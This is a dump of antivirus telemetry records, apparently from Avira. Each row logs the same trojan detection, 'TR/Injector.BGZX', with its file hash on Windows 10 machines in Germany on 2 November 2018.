  Row(detection=Row(filename='avscan-20181102-052923-3a3fe4e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052923-3A3FE4E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052123-1c2f4811', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052123-1C2F4811', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051316-f995a1fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051316-F995A1FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051355-11370744', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051355-11370744', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051324-fe878040', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051324-FE878040', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052112-156a5fb4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052112-156A5FB4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051304-f25dd527', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051304-F25DD527', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052956-4dbd5a33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052956-4DBD5A33', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051323-fda2f991', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051323-FDA2F991', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052953-4c16a10e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052953-4C16A10E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052955-4d24816b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052955-4D24816B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051330-01f4996c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051330-01F4996C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051307-f43713e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051307-F43713E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051307-f447cffc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051307-F447CFFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052959-4fc5ba5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052959-4FC5BA5D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052947-48a2bd32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052947-48A2BD32', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052947-48427853', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052947-48427853', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052947-48630dbb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052947-48630DBB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051315-f8d1ad88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051315-F8D1AD88', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052159-318046fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052159-318046FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052125-1ce7ef3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052125-1CE7EF3C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052111-14a774e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052111-14A774E2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062528-0fae6d36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062528-0FAE6D36', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062526-0e7f0b52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062526-0E7F0B52', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060836-b4956e6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060836-B4956E6A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055044-357f0316', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055044-357F0316', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060837-b4ddce69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060837-B4DDCE69', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062526-0eac81fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062526-0EAC81FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061722-ee57af2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061722-EE57AF2B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053649-43f729f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053649-43F729F4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062512-0682710d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062512-0682710D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051629-6ca9941d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051629-6CA9941D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062701-47353cb0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062701-47353CB0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:27:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055311-8cf0f614', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055311-8CF0F614', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055325-95755cad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055325-95755CAD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055012-22794211', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055012-22794211', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061830-1697d2ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061830-1697D2CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053637-3cb5be4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053637-3CB5BE4A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055314-8ee41a70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055314-8EE41A70', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051602-5c5d0741', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051602-5C5D0741', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062515-084f88be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062515-084F88BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061834-18ca180a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061834-18CA180A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060827-af7ec174', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060827-AF7EC174', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061755-019e3a88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061755-019E3A88', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061820-106760ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061820-106760CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060821-abbceaea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060821-ABBCEAEA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055055-3c5bdb8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055055-3C5BDB8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061755-019621c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061755-019621C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051603-5d6fdccc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051603-5D6FDCCC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060854-bf817902', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060854-BF817902', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060855-bfadd25e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060855-BFADD25E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062153-8fa08100', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062153-8FA08100', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061808-09be0e7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061808-09BE0E7E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055057-3d1abad1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055057-3D1ABAD1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061839-1c338f3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061839-1C338F3C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:38Z'), dt=datetime.date(2018, 11, 2)),
